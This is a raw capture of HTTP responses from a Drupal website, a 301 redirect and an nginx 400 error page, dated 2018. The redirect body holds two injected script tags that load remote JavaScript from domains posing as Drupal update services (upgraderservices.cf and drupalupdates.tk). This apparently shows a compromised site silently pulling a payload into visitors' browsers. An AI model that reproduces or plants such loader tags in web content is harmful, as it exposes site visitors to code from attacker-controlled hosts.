1542750428
HTTP/1.1 301 Moved Permanently
Server: nginx/1.12.2
Date: Tue, 20 Nov 2018 21:42:06 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.26
X-Drupal-Cache: MISS
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
X-Content-Type-Options: nosniff
Location: http://onlineflora.ac.cn/?q=zh-hans

98
<script type="text/javascript" src="//upgraderservices.cf/drupal.js"></script><script type="text/javascript" src="//drupalupdates.tk/check.js"></script>
0

HTTP/1.1 400 Bad Request
Server: nginx/1.12.2
Date: Tue, 20 Nov 2018 21:42:06 GMT
Content-Type: text/html
Content-Length: 173
Connection: close

<html>
<head><title>400 Bad Request</title></head>
<body bgcolor="white">
<center><h1>400 Bad Request</h1></center>
<hr><center>nginx/1.12.2</center>
</body>
</html>
